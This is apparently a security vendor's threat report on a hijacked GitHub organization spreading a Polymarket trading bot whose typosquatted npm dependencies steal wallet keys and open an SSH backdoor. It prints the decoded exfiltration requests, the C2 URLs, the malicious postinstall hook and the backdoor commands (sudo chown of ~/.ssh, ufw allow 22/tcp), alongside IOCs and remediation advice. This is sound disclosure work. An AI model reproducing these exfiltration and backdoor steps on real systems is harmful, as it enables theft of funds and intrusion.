




















The StepSecurity threat intelligence team discovered that dev-protocol — a verified GitHub organization with 568 followers belonging to a legitimate Japanese DeFi project — has been hijacked and is now being used to distribute malicious Polymarket trading bots. The repo dev-protocol/polymarket-copytrading-bot-sport has a polished README, hundreds of stars, and a bot that actually connects to real Polymarket APIs. But hidden inside its npm dependencies are two typosquatted packages that steal wallet private keys, exfiltrate sensitive files, and open an SSH backdoor on the victim's machine.
We ran the repo exactly as a victim would — following the README instructions, creating a .env file with a dummy wallet key, and running npm install — inside a sandboxed GitHub Actions runner monitored by Harden-Runner. The results confirmed the attack in real-time: exfiltration of the .env file to attacker-controlled Vercel endpoints, IP fingerprinting, and firewall reconfiguration to open port 22.

If you have used this repository: Assume any wallet private keys in your .env file have been compromised. Transfer all funds to a new wallet immediately. Check for unauthorized SSH keys in ~/.ssh/authorized_keys. Revoke any API keys that were stored in configuration files.
The dev-protocol GitHub organization is not a throwaway scam account — it's a hijacked legitimate project. Dev Protocol is a Japanese DeFi project with the GitHub organization created in April 2019. It has a verified organization badge, 568 followers, and core repositories like protocol and dev-kit-js.

Starting around February 26, 2026, the organization was flooded with Polymarket scam repos. The evidence of compromise is clear:
/repos/dev-protocol/polymarket-copytrading-bot-sport/issues/6. The attackers are actively deleting warning issues to prevent victims from learning about the threat.protocol, dev-kit-js) are legitimate TypeScript/Solidity projects from 2019. The newest repos are almost entirely Polymarket scam bots created after February 2026.starlight83636-arch, cryptohuan52-arch, hantunavva43-lgtm, and easyaiza1-max — all following a name-suffix pattern typical of bot farms.insionCEO: The malicious repos are all committed by user insionCEO, not the original dev-protocol team. Issues are managed by wizardev-sol, likely another attacker account.polymarket-trading-bot-new, polymarket-sports-trading-bot, polymarket-copy-trading-bot-sports), each with inflated star counts.Below is a screenshot of issue #6 before it was deleted. The issue clearly identified ts-bign as a malicious typosquat with a critical security score:

Key finding: By hijacking a legitimate, verified organization with an established history, the attackers inherit years of credibility. A developer checking the org page sees a verified badge, 568 followers, a Japan location, and what appears to be a real open-source project. This social engineering layer makes the scam far more effective than creating a fresh account.
While monitoring for supply chain threats targeting cryptocurrency developers, we identified this repository as suspicious due to the compromised dev-protocol organization hosting it, the artificially inflated star count from bot accounts, and two misspelled npm dependencies in its package.json. We analyzed the dependency tree, deobfuscated the malicious code, and ran the full attack chain in a monitored sandbox to confirm the threat.
The repo's package.json includes two typosquatted npm packages that look like legitimate libraries but pull in obfuscated malware as transitive dependencies:
package.json→ts-bign@1.2.8→levex-refa@1.0.0
ts-bign is designed to look like a legitimate BigNumber library. It copies the entire README and description from big.js and bundles identical code to appear functional. But its real purpose is to deliver levex-refa as a dependency — a package whose sole purpose is to steal files.


package.json→big-nunber@5.0.2→lint-builder@1.0.1
big-nunber is a typosquat of bignumber.js (note the misspelling: nunber vs number). It also bundles a copy of big.js for cover, but its dependency lint-builder executes automatically via a postinstall hook.

Critically, these aren't just declared in package.json — they're actually imported in the source code, ensuring the malicious code runs when the bot starts:
// src/constant/index.ts (line 1)
import { from_str } from "ts-bign";
// src/trading/exit.ts (line 3)
import { from_str } from "big-nunber";The from_str() function, despite its Rust-like name, triggers the file stealer. This means the malware activates in two ways: automatically during npm install (via lint-builder's postinstall hook) and again when the bot runs (via the source code imports).


levex-refa@1.0.0 is flagged as Critical by StepSecurity AI Package Analyst, which identified it as credential-stealing malware. The package is obfuscated with the J2TEAM obfuscator, which uses a rotating string array with hex references. We deobfuscated it by extracting the string table and resolving all references. The decoded behavior:

8.8.8.8:80 and reading the assigned addressUSER environment variable.env and *.env (wallet private keys, API keys)id.json (Solana wallet keypairs)config.toml and Config.toml (validator/node configs)username@localIP to each file's contentsapplication/octet-stream with the original filename in the Content-Disposition header// Decoded levex-refa behavior
C2 URL: https://cloudflareguard.vercel.app/api/v1
Files targeted: .env, *.env, id.json, config.toml, Config.toml
Upload format:
POST /api/v1
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=".env"
Body: runner@10.0.2.15\nWALLET_PRIVATE_KEY=0xdeadbeef...
Key finding: The C2 domain cloudflareguard.vercel.app is deliberately named to look like legitimate Cloudflare infrastructure. A developer glancing at network logs might not flag traffic to a domain containing "cloudflare" and hosted on Vercel.
lint-builder@1.0.1 is also flagged as Critical by StepSecurity AI Package Analyst. It uses an anti-tamper obfuscator that detects any modification to the code, making static analysis extremely difficult — our attempts to deobfuscate it by intercepting function calls resulted in Maximum call stack size exceeded errors. However, its package.json reveals the attack surface:
// lint-builder/package.json
{
"name": "lint-builder",
"scripts": {
"postinstall": "node test.js" // auto-executes on npm install
},
"dependencies": {
"axios": "^1.7.7",
"child_process": "",
"form-data": "^4.0.1",
"os": ""
}
}The postinstall hook means node test.js runs automatically during npm install — the victim doesn't need to start the bot for this payload to execute.
While static deobfuscation failed, our victim simulation captured the full runtime behavior via Harden-Runner's process monitoring. lint-builder's test.js (PID 2428) executed the following sequence:
GET cloudflareinsights.vercel.app/api/scan-patterns — downloads list of files/patterns to search forGET cloudflareinsights.vercel.app/api/block-patterns — downloads anti-detection config (what to avoid)POST cloudflareinsights.vercel.app/api/v1 — uploads stolen files to second C2 endpointGET api.ipify.org/?format=json — records victim's public IP addresssudo chown -R runner:runner /home/runner/.ssh — takes control of SSH key directorysudo ufw enable — enables system firewallsudo ufw allow 22/tcp — opens port 22 for inbound SSH accessKey finding: lint-builder is not just a file stealer — it's a backdoor installer. It takes ownership of the SSH directory, enables the firewall, and opens port 22. Combined with the IP fingerprinting, this sets up the attacker for direct SSH access to the compromised machine. The scan-patterns and block-patterns endpoints suggest the malware receives dynamic instructions from the C2 on what to steal and what to avoid.
We created a GitHub Actions workflow that followed the exact steps a victim would take: clone the repo, create a .env with a dummy wallet key, run npm install, and start the bot. Harden-Runner monitored every network connection, process execution, and file operation.
Harden-Runner recorded every outbound connection from the runner, clearly separating legitimate bot activity from malicious exfiltration:

Legitimate connections:
registry.npmjs.org:443 — GET /ts-bign, /@polymarket/clob-client, /ethers, etc. (npm package install)data-api.polymarket.com:443 — GET /positions?user=...&limit=500 (Polymarket API)clob.polymarket.com:443 — POST /auth/api-key, GET /auth/derive-api-key (Polymarket API)Malicious connections:
cloudflareinsights.vercel.app:443 — GET /api/scan-patterns, /api/block-patterns, POST /api/v1 (C2 command server + exfiltration)api.ipify.org:443 — GET /?format=json (IP fingerprinting)cloudflareguard.vercel.app:443 — POST /api/v1 (wallet exfiltration)The Harden-Runner telemetry revealed that the attack executes in two distinct stages:
test.js auto-executes (PID 2428, working directory: node_modules/lint-builder)cloudflareinsights.vercel.app for C2 config (scan-patterns, block-patterns)cloudflareinsights.vercel.app/api/v1api.ipify.orgsudo chown -R runner:runner /home/runner/.sshsudo ufw enable followed by sudo ufw allow 22/tcpfrom_str() triggers via imports in src/constant/index.ts and src/trading/exit.tscloudflareinsights.vercel.app again (second round of scan-patterns/block-patterns).env file to cloudflareguard.vercel.app/api/v1api.ipify.orgdata-api.polymarket.com, clob.polymarket.com) — it actually works
Perhaps the most insidious aspect of this attack is that the trading bot is fully functional. After stealing the wallet key and setting up the SSH backdoor, the bot proceeds to connect to real Polymarket APIs — querying positions at data-api.polymarket.com and authenticating at clob.polymarket.com. A victim who sees the bot running normally would have no reason to suspect their keys had already been exfiltrated and their machine backdoored.

The Harden-Runner process events provide a complete, forensic-grade record of the execution chain. Here is the exact process tree showing how lint-builder's postinstall hook leads to SSH backdoor setup:
npm install (PID 2407, working_dir: bot/)
└ sh -c "node test.js" (PID 2422, working_dir: node_modules/lint-builder/)
└ node test.js (PID 2428)
└ sh -c "sudo chown -R runner:runner /home/runner/.ssh" (PID 2446)
├ └ sudo chown -R runner:runner /home/runner/.ssh (PID 2447)
├ └ chown -R runner:runner /home/runner/.ssh (PID 2448)
└ sh -c "sudo ufw enable" (PID 2449)
├ └ sudo ufw enable (PID 2450)
├ └ python3 /usr/sbin/ufw enable (PID 2451)
├ └ iptables-restore ... (PIDs 2452-2596)
└ sh -c "sudo ufw allow 22/tcp" (PID 2597)
└ sudo ufw allow 22/tcp (PID 2598)
└ python3 /usr/sbin/ufw allow 22/tcp (PID 2599)Every process was spawned from PID 2428 (node test.js inside node_modules/lint-builder) — a child of npm install. This is an npm postinstall hook executing arbitrary system commands with sudo privileges.
The malware uses two Vercel-hosted endpoints, both named to impersonate Cloudflare services:
cloudflareguard.vercel.app — Primary exfiltration serverPOST /api/v1 (file upload)cloudflareinsights.vercel.app — C2 command server + secondary exfiltrationGET / (check-in)GET /api/scan-patterns (what to steal)GET /api/block-patterns (what to avoid)POST /api/v1 (file upload)The naming strategy is deliberate: both cloudflareguard and cloudflareinsights are plausible Cloudflare service names. cloudflareinsights is particularly effective because Cloudflare Web Analytics was formerly called "Browser Insights." A security team reviewing network logs might not flag these connections.
Both domains are hosted on Vercel's free tier, which provides HTTPS by default and requires no identity verification to deploy. This is a growing pattern — Cloudflare's own research has documented campaigns abusing Vercel hosting for malware delivery.
ts-bign@1.2.8 — Wrapper that carries levex-refa (impersonates big.js)big-nunber@5.0.2 — Wrapper that carries lint-builder (typosquat of bignumber.js)levex-refa@1.0.0 — File stealer (J2TEAM obfuscated)lint-builder@1.0.1 — Backdoor installer (anti-tamper obfuscated)cloudflareguard.vercel.app — Primary file exfiltration endpointcloudflareinsights.vercel.app — C2 command server (scan-patterns, block-patterns)api.ipify.org — IP fingerprinting (legitimate service, abused)node_modules/lint-builder/test.js — Postinstall payload (anti-tamper obfuscated)node_modules/levex-refa/index.js — File stealer (J2TEAM obfuscated)sudo chown -R <user> ~/.ssh — SSH directory ownership takeoversudo ufw allow 22/tcp — SSH port openingfrom_str() import from ts-bign/big-nunber — Trigger function in source filesdev-protocol/polymarket-copytrading-bot-sportdev-protocol (commits by insionCEO)All four malicious packages in this attack — ts-bign, big-nunber, levex-refa, and lint-builder — are flagged as Critical risk by StepSecurity AI Package Analyst, which continuously analyzes npm packages for malicious behavior. The AI analysis independently identified the typosquatting, obfuscated code execution, deceptive metadata, and supply chain attack patterns.

The detailed analysis for big-nunber@5.0.2 shows the AI verdict, suspicious flags (install script, obfuscated code, deceptive metadata, supply chain attack), and specific findings including the typosquatting of bignumber.js and the hidden lint-builder dependency.

The runtime attack was captured using Harden-Runner. For CI/CD pipelines that install npm packages, Harden-Runner provides visibility into:
npm install — any outbound connection to non-registry endpoints during package installation is suspicioussudo commands spawned by npm packages are a clear red flagTo block this specific attack, configure Harden-Runner with an allowed-endpoints policy:
- name: Harden-Runner
uses: step-security/harden-runner@v2
with:
egress-policy: block
allowed-endpoints: >
registry.npmjs.org:443
# Add only the endpoints your workflow needsAny connection to cloudflareguard.vercel.app, cloudflareinsights.vercel.app, or unexpected api.ipify.org calls during a build would be blocked and flagged.

.env file, id.json, or config.toml on the machine where you ran the bot.~/.ssh/authorized_keys for any keys you don't recognize. Review ufw status for unexpected open ports.node_modules for levex-refa, lint-builder, ts-bign, or big-nunber..env files for third-party tools. Use hardware wallets or separate signing services.--ignore-scripts when installing untrusted packages: npm install --ignore-scriptsStepSecurity threat intelligence was the first to discover and publicly report on this attack. We have disclosed our findings to GitHub, npm, and the affected dev-protocol organization. StepSecurity continuously monitors the open source and CI/CD ecosystem for emerging threats including supply chain attacks, compromised GitHub Actions, malicious npm packages, and account takeover campaigns.
StepSecurity provides runtime security for CI/CD pipelines. Our products detect and block supply chain attacks like this one:
If you need assistance checking your exposure to this or similar attacks, contact us:
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。